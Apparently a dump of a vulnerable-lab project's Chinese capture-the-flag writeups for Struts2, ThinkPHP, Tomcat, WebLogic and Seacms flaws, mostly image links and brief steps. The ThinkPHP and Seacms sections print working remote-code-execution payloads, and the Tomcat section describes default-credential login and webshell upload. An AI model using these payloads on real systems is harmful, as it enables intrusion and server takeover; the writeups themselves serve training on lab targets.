5 | Struts2 存在远程代码执行的严重漏洞; 目前 Struts2 官方已经确认漏洞(漏洞编号 S2-045 , CVE 编号: CVE-2017-5638 ),并定级为高风险。
6 |
7 | ## 影响版本
8 |
9 | - Struts 2.3.5 – Struts 2.3.31
10 | - Struts 2.5 – Struts 2.5.10
11 |
12 | ## 利用流程
13 |
14 | 访问地址: `10.10.11.20:31433`
15 |
16 | 名称:vulfocus/struts-045
17 |
18 | 使用Struts2全版本漏洞测试工具获取 flag 成功
19 |
20 | 
21 |
22 |
--------------------------------------------------------------------------------
/writeup/struts2-045_xiajibaxie/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/struts2-045_xiajibaxie/1.png
--------------------------------------------------------------------------------
/writeup/struts2-045_xiajibaxie/struts2-045.md:
--------------------------------------------------------------------------------
1 | # struts2-045(CVE-2017-5638)by [xiajibaxie](https://github.com/xiajibaxie)
2 |
3 | ## 漏洞描述
4 |
5 | 安恒信息安全研究院WEBIN实验室高级安全研究员 nike.zheng 发现著名 J2EE 框架—— Struts2 存在远程代码执行的严重漏洞; 目前 Struts2 官方已经确认漏洞(漏洞编号 S2-045 , CVE 编号: CVE-2017-5638 ),并定级为高风险。
6 |
7 | ## 影响版本
8 |
9 | Struts 2.3.5 – Struts 2.3.31
10 | Struts 2.5 – Struts 2.5.10
11 |
12 | ## 利用流程
13 |
14 | 访问地址: `10.10.11.20:54169`
15 |
16 | 名称:vulfocus/struts-045
17 |
18 | 使用Struts2全版本漏洞测试工具获取 flag 成功
19 |
20 | 
21 |
22 |
23 |
24 | 通关!
25 |
26 | ## 参考
27 |
28 | https://blog.csdn.net/rossrocket/article/details/67674290
29 |
30 |
--------------------------------------------------------------------------------
/writeup/struts2-052_CVE-2017-9805_hu4wufu/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/struts2-052_CVE-2017-9805_hu4wufu/1.png
--------------------------------------------------------------------------------
/writeup/struts2-052_CVE-2017-9805_hu4wufu/52.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/struts2-052_CVE-2017-9805_hu4wufu/52.png
--------------------------------------------------------------------------------
/writeup/struts2-052_CVE-2017-9805_hu4wufu/README.md:
--------------------------------------------------------------------------------
1 | # struts2-052(CVE-2017-9805)by [hu4wufu](https://github.com/hu4wufu)
2 |
3 | ## 漏洞描述
4 |
5 | 2017年9月5日,Apache Struts 官方发布最新的安全公告称,Apache Struts 2.5.x 的 REST 插件存在远程代码执行高危漏洞,漏洞编号为 CVE-2017-9805(S2-052),攻击者可以通过构造恶意 XML 请求在目标服务器上远程执行任意代码。漏洞的成因是由于使用 XStreamHandler 反序列化 XStream 实例的时候没有执行严格的过滤导致远程代码执行。
6 |
7 | ## 影响版本
8 |
9 | Struts 2.5 - Struts 2.5.12
10 |
11 | ## 利用流程
12 |
13 | 使用Struts2全版本漏洞测试工具获取 flag 成功
14 |
15 | 
16 |
17 |
--------------------------------------------------------------------------------
/writeup/struts2-052_xiajibaxie/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/struts2-052_xiajibaxie/1.png
--------------------------------------------------------------------------------
/writeup/struts2-052_xiajibaxie/CVE-2017-9805.md:
--------------------------------------------------------------------------------
1 | # struts2-052(CVE-2017-9805)by [xiajibaxie](https://github.com/xiajibaxie)
2 |
3 | ## 漏洞描述
4 |
5 | 2017年9月5日,Apache Struts 官方发布最新的安全公告称,Apache Struts 2.5.x 的 REST 插件存在远程代码执行高危漏洞,漏洞编号为 CVE-2017-9805(S2-052),攻击者可以通过构造恶意 XML 请求在目标服务器上远程执行任意代码。漏洞的成因是由于使用 XStreamHandler 反序列化 XStream 实例的时候没有执行严格的过滤导致远程代码执行。
6 |
7 | ## 影响版本
8 |
9 | Struts 2.5 - Struts 2.5.12
10 |
11 | ## 利用流程
12 |
13 | 访问地址: `10.10.11.20:54096`
14 |
15 | 名称:struts2-052/cve-2017-9805
16 |
17 | 使用Struts2全版本漏洞测试工具获取 flag 成功
18 |
19 | 
20 |
21 |
22 |
23 | 通关!
24 |
25 | ## 参考
26 |
27 | https://blog.csdn.net/flurry_rain/article/details/82706273
28 |
29 |
--------------------------------------------------------------------------------
/writeup/struts2-053_xiajibaxie/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/struts2-053_xiajibaxie/1.png
--------------------------------------------------------------------------------
/writeup/struts2-053_xiajibaxie/CVE-2017-12611.md:
--------------------------------------------------------------------------------
1 | # struts2-053(cve-2017-12611)by [xiajibaxie](https://github.com/xiajibaxie)
2 |
3 | ## 漏洞描述
4 |
5 | 继 S2-052 之后,Apache Struts 2 再次被曝存在远程代码执行漏洞,漏洞编号 S2-053 , CVE 编号 `CVE-2017-1000112` 。当开发人员在 Freemarker 标签中使用错误的构造时,可能会导致远程代码执行漏洞。。
6 |
7 | ## 影响版本
8 |
9 | Struts 2.0.1 - Struts 2.3.33
10 |
11 | Struts 2.5 - Struts 2.5.10
12 |
13 | ## 利用流程
14 |
15 | 访问地址: `10.10.11.20:39180`
16 |
17 | 名称:struts2-053/cve-2017-12611
18 |
19 | 使用Struts2全版本漏洞测试工具获取 flag 成功
20 |
21 | 
22 |
23 |
24 |
25 |
26 |
27 | 通关!
28 |
29 | ## 参考
30 |
31 | https://blog.csdn.net/lijia111111/article/details/78230480
32 |
33 |
--------------------------------------------------------------------------------
/writeup/struts2-055_xiajibaxie/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/struts2-055_xiajibaxie/1.png
--------------------------------------------------------------------------------
/writeup/struts2-055_xiajibaxie/CVE-2017-7525.md:
--------------------------------------------------------------------------------
1 | # struts2-055(CVE-2017-7525)by [xiajibaxie](https://github.com/xiajibaxie)
2 |
3 | ## 漏洞描述
4 |
5 | 2017年12月1日,Apache Struts发布最新的安全公告,Apache Struts 2.5.x REST插件存在远程代码执行的中危漏洞,漏洞编号与CVE-2017-7525相关。漏洞的成因是由于使用的Jackson版本过低在进行JSON反序列化的时候没有任何类型过滤导致远程代码执行。
6 |
7 | ## 影响版本
8 |
9 | Struts 2.5 - Struts 2.5.14
10 |
11 | ## 利用流程
12 |
13 | 访问地址: `10.10.11.20:57394`
14 |
15 | 名称:struts2-052/cve-2017-9805
16 |
17 | 访问url:`http://10.10.11.20:57394/struts2-055/orders.xhtml`
18 |
19 | 使用Struts2脚本获取 flag 成功
20 |
21 | 
22 |
23 | 通关!
24 |
25 | ## 参考
26 |
27 |
28 |
29 | [http://xxlegend.com/2017/12/06/S2-055%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA%E4%B8%8E%E5%88%86%E6%9E%90/](http://xxlegend.com/2017/12/06/S2-055漏洞环境搭建与分析/)
30 |
31 |
--------------------------------------------------------------------------------
/writeup/thinkphp_5.0.21命令执行/exp.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/thinkphp_5.0.21命令执行/exp.jpg
--------------------------------------------------------------------------------
/writeup/thinkphp_5.0.21命令执行/py-tool.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/thinkphp_5.0.21命令执行/py-tool.jpg
--------------------------------------------------------------------------------
/writeup/thinkphp_5.0.21命令执行_hu4wufu/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/thinkphp_5.0.21命令执行_hu4wufu/1.png
--------------------------------------------------------------------------------
/writeup/thinkphp_5.0.21命令执行_hu4wufu/thinkphp_5.0.21命令执行.md:
--------------------------------------------------------------------------------
1 |
2 | # thinkphp_5.0.21命令执行 by [hu4wufu](https://github.com/hu4wufu)
3 |
4 | ## 漏洞描述
5 |
6 | Thinkphp5.x 版本(5.0.20)中没有对路由中的控制器进行严格过滤,在存在 admin,index 模块、没有开启强制路由的条件下(默认不开启),导致可以注入恶意代码利用反射类调用命名空间其他任意内置类,完成远程代码执行。
7 |
8 | ## 影响版本
9 |
10 | ThinkPHP 5.x < ThinkPHP 5.1.31<= ThinkPHP 5.0.23
11 |
12 | ## 利用流程
13 |
14 | 1、打开靶场、抓包分析,下面是poc,拿到flag成功。
15 |
16 | 
17 | ```
18 | GET /index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/tmp HTTP/1.1
19 | Host: 118.193.36.37:28446
20 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
21 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
22 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
23 | Accept-Encoding: gzip, deflate
24 | Connection: close
25 | Cookie: redirect=1
26 | Upgrade-Insecure-Requests: 1
27 |
28 | ```
--------------------------------------------------------------------------------
/writeup/tomcat-pass-getshell/20200509093439.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/tomcat-pass-getshell/20200509093439.png
--------------------------------------------------------------------------------
/writeup/tomcat-pass-getshell/20200509093752.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/tomcat-pass-getshell/20200509093752.png
--------------------------------------------------------------------------------
/writeup/tomcat-pass-getshell/20200509094309.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/tomcat-pass-getshell/20200509094309.png
--------------------------------------------------------------------------------
/writeup/tomcat-pass-getshell/20200509094443.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/tomcat-pass-getshell/20200509094443.png
--------------------------------------------------------------------------------
/writeup/tomcat-pass-getshell/tomcat-pass-getshell.md:
--------------------------------------------------------------------------------
1 | # tomcat pass getshell by [anonymity3712](https://github.com/anonymity3712)
2 |
3 | ## 漏洞描述
4 |
5 | tomcat 作为中间件的一员,漏洞方面也是要了解的。
6 | 弱口令进入后台直接上传 war 包 getshell 是一个经典的漏洞。
7 |
8 | ## writeup
9 |
10 | 访问靶机地址
11 |
12 | 
13 |
14 | 直接尝试弱口令登入 Manager App 后台 账号密码 tomcat/tomcat
15 |
16 | 
17 |
18 | 制作 war 包
19 |
20 | 先将 jsp 大马压缩为 zip,再将zip后缀改名为 war,然后上传 war 包:
21 |
22 | 
23 |
24 | 然后构造木马访问路径 http://靶机地址/压缩包名/shell名
25 |
26 | 
27 |
28 | 
29 |
30 | 获取到flag
31 |
32 |
33 |
--------------------------------------------------------------------------------
/writeup/weblogic命令执行_CVE-2020-2551_xiajibaxie/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/weblogic命令执行_CVE-2020-2551_xiajibaxie/1.png
--------------------------------------------------------------------------------
/writeup/weblogic命令执行_CVE-2020-2551_xiajibaxie/CVE-2020-2551.md:
--------------------------------------------------------------------------------
1 | # weblogic(CVE-2020-2551) by [xiajibaxie](https://github.com/xiajibaxie)
2 |
3 | ## 漏洞描述
4 |
5 | 2020年1月15日,Oracle 发布了一系列的安全补丁,其中 Oracle WebLogic Server 产品有高危漏洞,漏洞编号 CVE-2020-2551,CVSS 评分9.8分,漏洞利用难度低,可基于 IIOP 协议执行远程代码。影响范围为10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0。
6 |
7 | ## 利用流程
8 |
9 | 访问地址: `10.10.11.20:59494`
10 |
11 | 名称:weblogic(CVE-2020-2551)
12 |
13 | 使用工具获取 flag 成功
14 |
15 | 
16 |
17 |
18 |
19 | 通关!
20 |
21 | ## 参考
22 |
23 |
24 |
25 | [http://blog.topsec.com.cn/weblogic-cve-2020-2551%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/](http://blog.topsec.com.cn/weblogic-cve-2020-2551漏洞分析/)
26 |
27 |
--------------------------------------------------------------------------------
/writeup/webmin远程命令执行漏洞_CVE-2019-15107_hu4wufu/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/webmin远程命令执行漏洞_CVE-2019-15107_hu4wufu/1.png
--------------------------------------------------------------------------------
/writeup/webmin远程命令执行漏洞_CVE-2019-15107_hu4wufu/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/webmin远程命令执行漏洞_CVE-2019-15107_hu4wufu/2.png
--------------------------------------------------------------------------------
/writeup/webmin远程命令执行漏洞_CVE-2019-15107_hu4wufu/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/webmin远程命令执行漏洞_CVE-2019-15107_hu4wufu/3.png
--------------------------------------------------------------------------------
/writeup/webmin远程命令执行漏洞_CVE-2019-15107_hu4wufu/image-20200821155114277.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/webmin远程命令执行漏洞_CVE-2019-15107_hu4wufu/image-20200821155114277.png
--------------------------------------------------------------------------------
/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 1.png
--------------------------------------------------------------------------------
/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 10.png
--------------------------------------------------------------------------------
/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 11.png
--------------------------------------------------------------------------------
/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 12.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 12.png
--------------------------------------------------------------------------------
/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 13.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 13.png
--------------------------------------------------------------------------------
/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 14.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 14.png
--------------------------------------------------------------------------------
/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 15.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 15.png
--------------------------------------------------------------------------------
/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 16.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 16.png
--------------------------------------------------------------------------------
/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 17.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 17.png
--------------------------------------------------------------------------------
/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 18.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 18.png
--------------------------------------------------------------------------------
/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 19.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 19.png
--------------------------------------------------------------------------------
/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 2.png
--------------------------------------------------------------------------------
/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 20.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 20.png
--------------------------------------------------------------------------------
/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 21.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 21.png
--------------------------------------------------------------------------------
/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 22.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 22.png
--------------------------------------------------------------------------------
/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 23.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 23.png
--------------------------------------------------------------------------------
/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 3.png
--------------------------------------------------------------------------------
/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 4.png
--------------------------------------------------------------------------------
/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 5.png
--------------------------------------------------------------------------------
/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 6.png
--------------------------------------------------------------------------------
/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 7.png
--------------------------------------------------------------------------------
/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 8.png
--------------------------------------------------------------------------------
/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled 9.png
--------------------------------------------------------------------------------
/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/zentaopms_9.1.2_sql_SQL注入/Untitled.png
--------------------------------------------------------------------------------
/writeup/海洋cms_V6.45版本代码执行_Frivolous-scholar/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/海洋cms_V6.45版本代码执行_Frivolous-scholar/1.png
--------------------------------------------------------------------------------
/writeup/海洋cms_V6.45版本代码执行_Frivolous-scholar/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/海洋cms_V6.45版本代码执行_Frivolous-scholar/2.png
--------------------------------------------------------------------------------
/writeup/海洋cms_V6.45版本代码执行_Frivolous-scholar/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/海洋cms_V6.45版本代码执行_Frivolous-scholar/3.png
--------------------------------------------------------------------------------
/writeup/海洋cms_V6.45版本代码执行_Frivolous-scholar/海洋cms_V6.45版本代码执行.md:
--------------------------------------------------------------------------------
1 | # 海洋 cms V6.45版本代码执行 by [Frivolous-scholar](https://github.com/Frivolous-scholar)
2 |
3 | ## 概述
4 |
5 | 该漏洞成因在于 search.php 没有对用户输入内容进行过滤,导致攻击者提交的 order 参数可进入 parseIf 函数中执行 eval。
6 |
7 | ## 复现
8 |
9 | 1、首先打开靶场。
10 |
11 | 
12 |
13 | 2、输入任意内容搜索并抓包。
14 |
15 | 
16 |
17 | 3、利用 POC 拿到 Flag
18 |
19 | ```
20 | searchtype=5&order=}{end if}{if:1)$_POST[func]($_POST[cmd]);if(1}{end if}&func=system&cmd=ls /tmp
21 | ```
22 |
23 | 
24 |
--------------------------------------------------------------------------------
/writeup/海洋cms_V6.53版本代码执行_Frivolous-scholar/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/海洋cms_V6.53版本代码执行_Frivolous-scholar/1.png
--------------------------------------------------------------------------------
/writeup/海洋cms_V6.53版本代码执行_Frivolous-scholar/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/海洋cms_V6.53版本代码执行_Frivolous-scholar/2.png
--------------------------------------------------------------------------------
/writeup/海洋cms_V6.53版本代码执行_Frivolous-scholar/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/海洋cms_V6.53版本代码执行_Frivolous-scholar/3.png
--------------------------------------------------------------------------------
/writeup/海洋cms_V6.53版本代码执行_Frivolous-scholar/海洋cms_V6.53版本代码执行.md:
--------------------------------------------------------------------------------
1 | # 海洋 cms V6.53版本代码执行 by [Frivolous-scholar](https://github.com/Frivolous-scholar)
2 |
3 | ## 概述
4 |
5 | echoSearchPage 函数中的 content 变量传给了 parself 函数,跟踪代码,找到 ./include/main.class.php,可以看到 parseIf 函数会将content内容 eval 执行,造成命令执行。
6 |
7 | ## 复现
8 |
9 | 1、首先打开靶场。
10 |
11 | 
12 |
13 | 2、进行搜索并抓包。
14 |
15 | 
16 |
17 | 3、利用 POC 来拿 Flag,POC 如下。
18 |
19 | ```
20 | searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=sy&9[]=stem("ls /tmp");
21 | ```
22 |
23 | 
24 |
--------------------------------------------------------------------------------